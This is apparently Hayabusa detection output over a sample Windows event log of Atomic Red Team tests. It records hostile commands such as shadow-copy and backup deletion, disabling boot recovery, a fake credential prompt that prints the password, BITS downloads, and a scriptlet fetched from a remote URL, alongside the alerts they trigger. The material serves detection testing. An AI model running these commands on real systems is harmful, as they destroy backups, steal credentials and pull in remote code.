2019-07-19 23:45:56.033 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""del T1121.dll""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:56.069 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:19.052 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs  :  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:19.443 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RES1BEA.tmp"" ""c:\AtomicRedTeam\CSC8EBD65DB33242A1BAD76494F485AF42.TMP""  :  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"" T1121.dll  :  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:51.883 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell.exe  -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,CurrentControlSet Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentcontrolset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:37.096 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:37.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg.exe  import c:\AtomicRedTeam\atomics\T1103\T1103.reg  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,New DLL Added to AppInit_DLLs Registry Key,,rules/sigma/registry_event/sysmon_new_dll_added_to_appinit_dlls_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:37.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:40.691 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: vssadmin.exe  delete shadows /all /quiet  :  Path: C:\Windows\System32\vssadmin.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,critical,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:40.863 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wbadmin.exe  delete catalog -quiet  :  Path: C:\Windows\System32\wbadmin.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:45.773 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wbengine.exe""  :  Path: C:\Windows\System32\wbengine.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:45.958 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\vds.exe  :  Path: C:\Windows\System32\vds.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:46.112 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:51.816 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bcdedit.exe  /set {default} bootstatuspolicy ignoreallfailures  :  Path: C:\Windows\System32\bcdedit.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,high,Modification of Boot Configuration,,rules/sigma/process_creation/win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bcdedit.exe  /set {default} recoveryenabled no  :  Path: C:\Windows\System32\bcdedit.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,high,Modification of Boot Configuration,,rules/sigma/process_creation/win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:52.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:57.227 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sdelete.exe C:\some\file.txt""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:57.274 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:04.103 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe  /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe   /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1  :  Path: C:\Windows\System32\bitsadmin.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe  /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:05.365 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe  /create AtomicBITS  :  Path: C:\Windows\System32\bitsadmin.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,medium,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe  /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1  :  Path: C:\Windows\System32\bitsadmin.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.917 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe  /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1  :  Path: C:\Windows\System32\bitsadmin.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:31.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:31.041 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe  /complete AtomicBITS  :  Path: C:\Windows\System32\bitsadmin.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:31.134 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:31.157 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe  /resume AtomicBITS  :  Path: C:\Windows\System32\bitsadmin.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:31.240 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:36.834 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:36.882 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript.exe  /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost  script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct  :  Path: C:\Windows\System32\cscript.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:37.264 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:41.050 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:41.085 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe  /c  net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
